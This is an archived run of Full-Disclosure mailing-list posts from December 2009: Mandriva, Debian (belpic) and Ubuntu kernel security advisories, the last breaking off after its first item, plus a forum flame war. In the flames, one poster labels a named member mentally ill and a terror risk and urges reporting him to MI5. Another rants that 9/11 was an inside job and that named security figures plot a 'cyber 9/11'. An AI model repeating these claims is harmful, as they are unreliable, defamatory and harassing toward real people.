_______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: dcccce93e12e86c6828c5d0ab64b60db 2008.0/i586/libpostfix1-2.4.5-2.3mdv2008.0.i586.rpm 20e55a81da8945bce9ba75a3fa0cc5ba 2008.0/i586/postfix-2.4.5-2.3mdv2008.0.i586.rpm bd80b48f07b01709fead701fb07b7d45 2008.0/i586/postfix-ldap-2.4.5-2.3mdv2008.0.i586.rpm 3222bbb3c04c9b019b21ac022752872a 2008.0/i586/postfix-mysql-2.4.5-2.3mdv2008.0.i586.rpm 5c94516257af665aa545c1d3192589b2 2008.0/i586/postfix-pcre-2.4.5-2.3mdv2008.0.i586.rpm a2391ec8cd9bb49c86f4b3c2ea9b0357 2008.0/i586/postfix-pgsql-2.4.5-2.3mdv2008.0.i586.rpm c6d4a5c36d9131b02b42586cb3e0cacb 2008.0/SRPMS/postfix-2.4.5-2.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: bc509cca07a60d89f6e0fa3cd544ff65 2008.0/x86_64/lib64postfix1-2.4.5-2.3mdv2008.0.x86_64.rpm 6f4849980bde480ea49dccbe05808f0c 2008.0/x86_64/postfix-2.4.5-2.3mdv2008.0.x86_64.rpm e23e7d6fe949fea7eb39d8c6a96aa0b5 2008.0/x86_64/postfix-ldap-2.4.5-2.3mdv2008.0.x86_64.rpm beabc7a8336eda0e789e923e793d9521 2008.0/x86_64/postfix-mysql-2.4.5-2.3mdv2008.0.x86_64.rpm c6d62f79b946ec7661fd1206811c71c5 2008.0/x86_64/postfix-pcre-2.4.5-2.3mdv2008.0.x86_64.rpm 0e05a5809ee3301abce49c53afcb22a7 2008.0/x86_64/postfix-pgsql-2.4.5-2.3mdv2008.0.x86_64.rpm c6d4a5c36d9131b02b42586cb3e0cacb 2008.0/SRPMS/postfix-2.4.5-2.3mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGT0lmqjQ0CJFipgRAmdIAJ90ejK+c/OLTSUViv3QYe+RdPBG8ACfVxQj mZpkkzVG4KcRiT69yi29YJ0= =+YSA -----END PGP SIGNATURE----- From sahalderf at ymail.com Fri Dec 4 22:31:37 2009 From: sahalderf at ymail.com (Sam Haldorf) Date: Fri, 4 Dec 2009 14:31:37 -0800 (PST) Subject: [Full-disclosure] "funsec" as a terror cell In-Reply-To: Message-ID: <745672.32600.qm@web24802.mail.ird.yahoo.com> How do we tell who you are and who you aren't? You harass this list with so many aliases, even if someone did impersonate you, you're not reliable enough to trust. Regardless, No one cares. Andrew Wallace is the boy who cried wolf. Sam H --- full-disclosure at Safe-mail.net schrieb am So, 29.11.2009: Von: full-disclosure at Safe-mail.net Betreff: Re: [Full-disclosure] "funsec" as a terror cell An: Valdis.Kletnieks at vt.edu, full-disclosure at lists.grok.org.uk Datum: Sonntag, 29. November 2009, 6:55 > we've been outed by an MI7 mole. i honestly don't think you actually believe jdl at mac.hush.com was anything but an impersonation attempt. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __________________________________________________ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verf?gt ?ber einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091204/e83e5880/attachment.html From sahalderf at ymail.com Fri Dec 4 22:32:34 2009 From: sahalderf at ymail.com (Sam Haldorf) Date: Fri, 4 Dec 2009 14:32:34 -0800 (PST) Subject: [Full-disclosure] The Cyber War Conspiracy In-Reply-To: Message-ID: <573616.80292.qm@web24818.mail.ird.yahoo.com> What? Don't contact me you sick pervert. Someone please find out this subjects address and notify the government of him. Jesus. Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321" n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl and valdis. Please don't contact me. You're really scary. Take your medication and kindly leave. --- full-disclosure at Safe-mail.net schrieb am Di, 1.12.2009: Von: full-disclosure at Safe-mail.net Betreff: Re: AW: [Full-disclosure] The Cyber War Conspiracy An: sahalderf at ymail.com, full-disclosure at lists.grok.org.uk Datum: Dienstag, 1. Dezember 2009, 5:51 I bet you to it mate but good troll attempt all the same ;) http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html Hey Sam, amma let you finish, but n3td3v was the best troll of all time! -------- Original Message -------- From: Sam Haldorf To: full-disclosure at lists.grok.org.uk Cc: full-disclosure at Safe-mail.net Subject: AW: [Full-disclosure] The Cyber War Conspiracy Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST) ? This is just doing too far. He's obviously a paranoid schizophrenic who uses aliases to bring attention to himself. This means he's a loose cannon. A potential lone wolf terrorist. Who knows, he may decide to do something nasty to bring attention to his causes. It's obvious as Andrew Wallace's paranoia grows, his interest is going from infosec (trolling FD) to real life. He may to adapt his attention-seeking MO to real life, where he may harm real people. See what I mean? You know what you have to do. http://preview.tinyurl.com/report-n3td3v-to-MI5 Paste his paranoid ramblings in there. This will help the government prevent n3td3v from causing harm. They will keep a good eye on him. Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. Just state the obvious if you do infact consider him a threat. Which I obviously do. Thank you, Sam H --- full-disclosure at Safe-mail.net schrieb am Mo, 30.11.2009: Von: full-disclosure at Safe-mail.net Betreff: [Full-disclosure] The Cyber War Conspiracy An: full-disclosure at lists.grok.org.uk Datum: Montag, 30. November 2009, 10:45 It is my understanding the "security industry" would like nothing better than a cyber war to kick off, mass profit, mass employment, mass political capital to hit "cyber security" into the main stream of society to strike at the heart of the single mom and retired couple crowd. Cyber War is a touchy subject if you ask any "security professional" they don't like people saying straight out "cyber war is bullshit". They get emotional about it, its as if they want it to happen. I see a build up towards "Cyber War", the people in power such as Gadi Evron, he wants a Cyber War its all he talks about. He was the first person to draw conclusions out of fine air and were quick to blame the Russians for Estonia, even though there was no evidence. Just like 9/11, you knew it was an inside job because they announced within 24 hours they _knew_ it was Al-Qaeda even though they weren't able to stop the attack if they knew so much about it. Estonia turned out to be a kid in his bedroom with some bot net command & control, not the actual work of a super power. SANS want Cyber War, they asked the CIA to come to their SCADA conference in 2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact the event never happened or took place it was shear propaganda, misleading bullshit to build up the path for "Cyber War". "No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- This is a warning that something bad is about to happen. A cyber 9/11? The security industry need cyber war, the hacker scene is falling flat before our eyes there is no spectacular-event happened for a while, virus outbreaks and worms just don't happen like they used to to keep "cyber security" in high profile. The pro-propaganda for "cyber security" is running out, the security industry is crying out for a cyber 9/11 scale event and thats what scares me. One of the first things Obama took seriously when he went into the White House was Cyber Security, and remember the Marcus Sachs video even before the election, you could hear it in his words, you could see it in his body language, folks in power in cyber security want to get cyber security into the main stream media. Marcus Sachs asked how can we put cyber security infront of the media? Cyber security isn't something that is talked about in the media, how can we put it infront of the media and the next administration, he said. I trust Marcus Sachs like I trust a convicted paedophile. People like Joel Esler tried to defend him to me, how can you say such things about such a nice guy. But isn't everyone a nice guy on the surface? It's not until you really dig in and see the other side to a person and everyone has another side to them. If people like Marcus Sachs are advising Obama right now on cyber security, be afraid very afraid. Remember this is the guy who has a picture of himself shaking the hand of George W. Bush on his home page, and smiling about it. Because I said all this stuff previously I was attacked on this list, got banned by John Cartwright... there is a cover-up going on. My conclusions aren't sharp but they were on the right course, and they didn't want to risk the chance that I got something accurate, so they setup a bunch of aliases on here to provoke me into "troll style", to get people to think I was just an annoying twat and no value to this mailing list. The same people tried to say I was some screwball etc, desperately trying to get folks not to take anything I say seriously. They even tried to say I was anti-sec, yes "Ureleet" alias, remember him? He is to do with people who are involved with the people im accusing of building up towards cyber war. He isn't a random person, he is involved and scared that I or the British government might be onto them, they are running scared. Even the slightest mention of MI5 / MI6 sent them running scared that they have been rumbled and infiltrated by human assets. I'm serious about cyber security im not a troll and never was, I do have a vested interest in this stuff and I do want to collaborate or get hired with British intelligence to burst this plot wide open and expose the people involved in wanting a cyber 9/11. So this email address will be banned, more sponsored aliases will come along to make fun of n3td3v, post fake psychological profiles and the such for the next 11 months? This is people not trying to stop some kid called "n3td3v" this is a mass campaign against me, from the early days of the Neal Krawetz and Securityfocus effort to trash me, to the recent Ureleet and John Cartwright trying to trash me. Remember that jdl guy at the hushmail address who had the subject header "impersonation is against the law", that was a subject header I had been sending to John Cartwright to get something done about folks, then suddenly the jdl alias comes onto the list with exactly the same header. Coincidence? is it hell. John Cartwright is in on it, Ureleet is connected to John Cartwright and there is a conspiracy to gag me because I was touching home too many truths about the build up towards cyber war and the people behind the plot for a cyber 9/11. It's not kids in their bedrooms with the anti-n3td3v aliases, its these guys in the suits conspiring to carry out a cyber 9/11. The aliases against me, they aren't kids. They are grown men security professionals, the same men who don't like being called out and can't even use their real names in their campaign against me. I openly post with my real name to criticize and still would be using my real name, accept it got banned by John Cartwright, the guy who hides behind grok.org.uk and nobody knows anything about, hiding in the shadows while banning anyone from this list who remotely gets close to the political truth. If you look back to January 2009 when "n3td3v" got banned it was exactly at the point where I wasn't believing in cyber war. I am the only person to be banned from this mailing list, you've got to ask yourself why. All I done was "full disclosure" which is what this list is about, but the people in power don't like it when its full disclosure of them not other people. Like the Mossad and Funsec, they don't like that mentioned on full disclosure. It's full disclosure of information, but because it involves something not liked because it exposes them, then its not accepted. You need to look into the real reasons n3td3v got banned and its nothing to do with what you think is the reason of someone with no value to the mailing list. Who dare say which disclosures are value and who's aren't. So already you're seeing evidence this mailing list is corrupt and the person running it panicking because his friends over at SANS and other places are being exposed for their crave for cyber war and a cyber 9/11 event to take place. Valdis isn't a random person either, hes proved hes pro-cyber war with a vested interest against me saying any of this stuff. Look at the people against me, then investigate their role in the ring of power thats developing in the cyber security vaccum. This is probably the last you'll see of the real n3td3v because there is sure to be a contract killer out to silence me. There have already been discreet warnings, like in the mp3 that was posted by , it said mi6 were going to kill me, they actually ment U.S Intelligence, but put MI6 in its place just to screw with British Intelligence even more. And the warning by - o z - and reposted by sahalderf at ymail.com that said "Solutions:? There's a few, but I wouldn't want to be responsible for the end result" If I was just some kid troll, would any of this have gone on for so long? How many years is it now? There will be no let down, there has been no trolling apart from the times the sponsored aliases have frustrated me into a flame to distract me from posting what I wanted to post that was hitting the political truth too much. There is more going on than you can see, this is a war at the moment of words because there are vested interest groups out there wanting cyber war to advance the security industry, while there are people like me who are monitoring these guys and seeing their intentions and they don't like anyone who is exposing them and me wanting to stop them from carrying out cyber-war/terrorism to advance the security industry. Expect more people impersonating me, signing as my real life name etc... mock psycho analysis emails being post by people who are too cowardly to use their real name, they aren't kids, they are the political elite trying to make sure anything I say is trashed. I am saving the world from the people who claim to be saving the world, but how can they be saving the world if they are planning a cyber event to push forward the advancement of the cyber security industry? Cue all the sponsored aliases who are out to get me, by the time you read this email address will already be banned. Just listen to the State of the Internet 2009 panel podcast by SANS, they got an audience to laugh out loud when they kept mentioning my n3td3v name, the recording is available on the internet as a podcast, this isn't just people annoyed about some kid on full-disclosure mailing list, this is part of a sophisticated campaign against me which started in 2006. This is unprecedented the amount of effort gone into trashing some apparent kid called "n3td3v", if I was just some kid they wouldn't be going to the lengths they have to trash me. This mailing list is part of corruption, the corruption that is covering up n3td3v and sweeping him under the carpet and throwing him away. My last words to you is, don't let this matter rest, they have got rid of n3td3v, but there are bound to be people who will investigate what im saying, and I hope they do. Because my last request before I finish this rant is, don't forget the things ive been talking about and continue to investigate people while im gone. This is serious the political elite are planning a cyber-event and it seems nobody is out to stop it or being proactive about raising concern about it apart from me. I'm the only one ranting about this stuff, but why haven't we got more people sounding the alarm the alarm that the build up is happening and there is nothing to stop it. I was banned in January, isn't it strange 11 months later the political elite still have their sponsored aliases trying to run "n3td3v" completely into the ground. They even impersonated my real name and a British intelligence agency, and who's always been right behind anti-n3td3v aliases as a back up reply? Yes Valdis, hes always there, always there to reply to give support to them. All I say is investigate whats going on against this so-called kid called n3td3v, surely there is more to it than just trying to get me off a mailing list cause of some "noise" excuse. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __________________________________________________ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verf?gt ?ber einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com __________________________________________________ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verf?gt ?ber einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091204/fe9a427f/attachment-0001.html From white at debian.org Fri Dec 4 21:02:22 2009 From: white at debian.org (Steffen Joeris) Date: Sat, 5 Dec 2009 08:02:22 +1100 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1946-1] New belpic packages fix cryptographic weakness Message-ID: <20091204210222.0B071849172@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1946-1 security at debian.org http://www.debian.org/security/ Steffen Joeris December 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : belpic Vulnerability : cryptographic weakness Problem type : remote Debian-specific: no CVE Id : CVE-2009-0049 Debian Bug : 511261 It was discovered that belpic, the belgian eID PKCS11 library, does not properly check the result of an OpenSSL function for verifying cryptographic signatures, which could be used to bypass the certificate validation. For the oldstable distribution (etch), this problem has been fixed in version 2.5.9-7.etch.1. For the stable distribution (lenny), this problem has been fixed in version 2.6.0-6, which was already included in the lenny release. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 2.6.0-6. We recommend that you upgrade your belpic packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/b/belpic/belpic_2.5.9-7.etch.1.diff.gz Size/MD5 checksum: 20340 d0d4ce8373f2f49800971113432ab35e http://security.debian.org/pool/updates/main/b/belpic/belpic_2.5.9-7.etch.1.dsc Size/MD5 checksum: 778 6a552980e5274b74128f2b43d5eecd84 http://security.debian.org/pool/updates/main/b/belpic/belpic_2.5.9.orig.tar.gz Size/MD5 checksum: 1790274 517a8617e5919b3218acf2d5d859ea8e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 87916 fce36aa5a4e516bece52ca1322328288 http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 156018 4e75d5671006c371f4a5aeeb216d2749 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 314606 2caa3f109ee32caabb5ef63702ff9536 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 338216 75704f922f932f7453fd475af22bac15 http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 153234 64e2984faecdb78f26566faa7b40c837 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_alpha.deb Size/MD5 checksum: 1013996 3a64d43f1fe914d0800b8cacb6a602ed amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 151240 ff1be550e65c3c234ea0ae3e8fa3f39e http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 150332 3dcdfb89cacf62cca1ffc3da471ff7c4 http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 87572 8a357ceb7f8a783d9fe127e0c0bfe943 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 330802 0ea774426304964b8bf07ee176fb4c91 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 305592 0d28550e3a3b2929c53057533726cb13 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_amd64.deb Size/MD5 checksum: 1013976 51c8584f0dcb8fd6b67727e13935f073 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 1012984 3f52c668f80dac56d6eba30b092bfa09 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 346390 8cce55c26535945b3c9ba13b6404142e http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 160238 2d6e75fb4994110b2f5b1227f2269a77 http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 87678 b126cca6dfc088fc0b8cc6775f0f2e7c http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 318312 7d244309c1b1e8a82f467ed0f4b01a8f http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_hppa.deb Size/MD5 checksum: 156784 062a94360e7af00b1d17a8883f2df33c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 148666 780cf47c2c9a3262b2a3d6e749759d21 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 311998 d2ec1c416b6b94edff51b6a652ef03e5 http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 144724 5b731d7498e0c87cca36221c8c1152d9 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 299860 0d60e423f940317db6028ff814e0f787 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 1014116 99fe999f58a645c88d1e859497215b50 http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_i386.deb Size/MD5 checksum: 87780 cf21f6df10e9b1b88ed35d858109b3ae ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 87626 d8d7df1a9d92a645d4c442579038998b http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 1014022 f4b5ce0eceb87f3ca7fa6a21e7c476f6 http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 169770 956d4fe1a91405f30c85e3b4089fd2cb http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 382222 5489754c01c0a12ad7ec421ad678e769 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 329702 3ac3fcbaa77b88d4981a25afab035ca4 http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_ia64.deb Size/MD5 checksum: 163648 35bc558bfb41eb1b15c2487624422ed4 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 153822 6925531d088aa05d1eef9cd5b9ece264 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 289498 4da6c0fbcddf102a7ec328060f8c7437 http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 87622 5f615f96eba9272c8a6be068bb610f52 http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 146534 8dd5ed4c08c3d8c105aaa3342cd4cf2b http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 305640 b356a3a69a8b8be76ff7bd220d436d7e http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_mips.deb Size/MD5 checksum: 1014040 cb0ab32eeabe5a1a61cb85503f08724a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 145358 fe04e7ea83258e37c889227d82c34598 http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 153556 7d5273ed7dff7ca723d84a24d79b474b http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 87628 93f8e1c0860045f8115334a8ce6848a4 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 303616 6851fb4c0ef60c5ae093dceeb073343d http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 288008 71477b21c578685d2c5d8bc4e637c110 http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_mipsel.deb Size/MD5 checksum: 1014036 122780976ad58d4d677271eb2719f4ba sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 305840 f141f398a8307a139bb06a1404654e4b http://security.debian.org/pool/updates/main/b/belpic/libbeid2_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 144866 b1585ec86c614963b303e50e6ff173e8 http://security.debian.org/pool/updates/main/b/belpic/beid-tools_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 142334 62d8aa616675850b39eb2f4a6b6e6dd2 http://security.debian.org/pool/updates/main/b/belpic/libbeid2-dev_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 87800 82e1751c7a5b6d5b79c85f224d2ceb22 http://security.debian.org/pool/updates/main/b/belpic/beidgui_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 298366 8da65df356289e0c0e6ccfbda359d76a http://security.debian.org/pool/updates/main/b/belpic/libbeidlibopensc2-dev_2.5.9-7.etch.1_sparc.deb Size/MD5 checksum: 1013848 cc15434108f03beb6c2ebf4fc3920981 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAksZeJkACgkQ62zWxYk/rQc1YwCeKDcSqhkeQs/3oB4E+VE6oJHz aqIAn1JXVNaG805ONKVfYcH6JKmWOHJ9 =5mnm -----END PGP SIGNATURE----- From kees at ubuntu.com Sat Dec 5 02:45:36 2009 From: kees at ubuntu.com (Kees Cook) Date: Fri, 4 Dec 2009 18:45:36 -0800 Subject: [Full-disclosure] [USN-864-1] Linux kernel vulnerabilities Message-ID: <20091205024536.GP6207@outflux.net> =========================================================== Ubuntu Security Notice USN-864-1 December 05, 2009 linux, linux-source-2.6.15 vulnerabilities CVE-2009-2909, CVE-2009-2910, CVE-2009-3080, CVE-2009-3228, CVE-2009-3547, CVE-2009-3612, CVE-2009-3613, CVE-2009-3620, CVE-2009-3621, CVE-2009-3623, CVE-2009-3624, CVE-2009-3638, CVE-2009-3722, CVE-2009-3725, CVE-2009-3726, CVE-2009-3888, CVE-2009-3889, CVE-2009-3939, CVE-2009-4005, CVE-2009-4026, CVE-2009-4027 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.81 linux-image-2.6.15-55-686 2.6.15-55.81 linux-image-2.6.15-55-amd64-generic 2.6.15-55.81 linux-image-2.6.15-55-amd64-k8 2.6.15-55.81 linux-image-2.6.15-55-amd64-server 2.6.15-55.81 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.81 linux-image-2.6.15-55-hppa32 2.6.15-55.81 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.81 linux-image-2.6.15-55-hppa64 2.6.15-55.81 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.81 linux-image-2.6.15-55-itanium 2.6.15-55.81 linux-image-2.6.15-55-itanium-smp 2.6.15-55.81 linux-image-2.6.15-55-k7 2.6.15-55.81 linux-image-2.6.15-55-mckinley 2.6.15-55.81 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.81 linux-image-2.6.15-55-powerpc 2.6.15-55.81 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.81 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.81 linux-image-2.6.15-55-server 2.6.15-55.81 linux-image-2.6.15-55-server-bigiron 2.6.15-55.81 linux-image-2.6.15-55-sparc64 2.6.15-55.81 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.81 Ubuntu 8.04 LTS: linux-image-2.6.24-26-386 2.6.24-26.64 linux-image-2.6.24-26-generic 2.6.24-26.64 linux-image-2.6.24-26-hppa32 2.6.24-26.64 linux-image-2.6.24-26-hppa64 2.6.24-26.64 linux-image-2.6.24-26-itanium 2.6.24-26.64 linux-image-2.6.24-26-lpia 2.6.24-26.64 linux-image-2.6.24-26-lpiacompat 2.6.24-26.64 linux-image-2.6.24-26-mckinley 2.6.24-26.64 linux-image-2.6.24-26-openvz 2.6.24-26.64 linux-image-2.6.24-26-powerpc 2.6.24-26.64 linux-image-2.6.24-26-powerpc-smp 2.6.24-26.64 linux-image-2.6.24-26-powerpc64-smp 2.6.24-26.64 linux-image-2.6.24-26-rt 2.6.24-26.64 linux-image-2.6.24-26-server 2.6.24-26.64 linux-image-2.6.24-26-sparc64 2.6.24-26.64 linux-image-2.6.24-26-sparc64-smp 2.6.24-26.64 linux-image-2.6.24-26-virtual 2.6.24-26.64 linux-image-2.6.24-26-xen 2.6.24-26.64 usb-modules-2.6.24-26-sparc64-di 2.6.24-26.64 Ubuntu 8.10: linux-image-2.6.27-16-generic 2.6.27-16.44 linux-image-2.6.27-16-server 2.6.27-16.44 linux-image-2.6.27-16-virtual 2.6.27-16.44 Ubuntu 9.04: linux-image-2.6.28-17-generic 2.6.28-17.58 linux-image-2.6.28-17-imx51 2.6.28-17.58 linux-image-2.6.28-17-iop32x 2.6.28-17.58 linux-image-2.6.28-17-ixp4xx 2.6.28-17.58 linux-image-2.6.28-17-lpia 2.6.28-17.58 linux-image-2.6.28-17-server 2.6.28-17.58 linux-image-2.6.28-17-versatile 2.6.28-17.58 linux-image-2.6.28-17-virtual 2.6.28-17.58 Ubuntu 9.10: linux-image-2.6.31-16-386 2.6.31-16.52 linux-image-2.6.31-16-generic 2.6.31-16.52 linux-image-2.6.31-16-generic-pae 2.6.31-16.52 linux-image-2.6.31-16-ia64 2.6.31-16.52 linux-image-2.6.31-16-lpia 2.6.31-16.52 linux-image-2.6.31-16-powerpc 2.6.31-16.52 linux-image-2.6.31-16-powerpc-smp 2.6.31-16.52 linux-image-2.6.31-16-powerpc64-smp 2.6.31-16.52 linux-image-2.6.31-16-server 2.6.31-16.52 linux-image-2.6.31-16-sparc64 2.6.31-16.52 linux-image-2.6.31-16-sparc64-smp 2.6.31-16.52 linux-image-2.6.31-16-virtual 2.6.31-16.52 After a standard system upgrade you need to reboot your computer to effect the necessary changes. ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. Details follow: It was discovered that the AX.25 network subsystem did not correctly check integer signedness in certain setsockopt calls. A local attacker could exploit this to crash the system, leading to a denial of service. Ubuntu 9.10 was not affected. 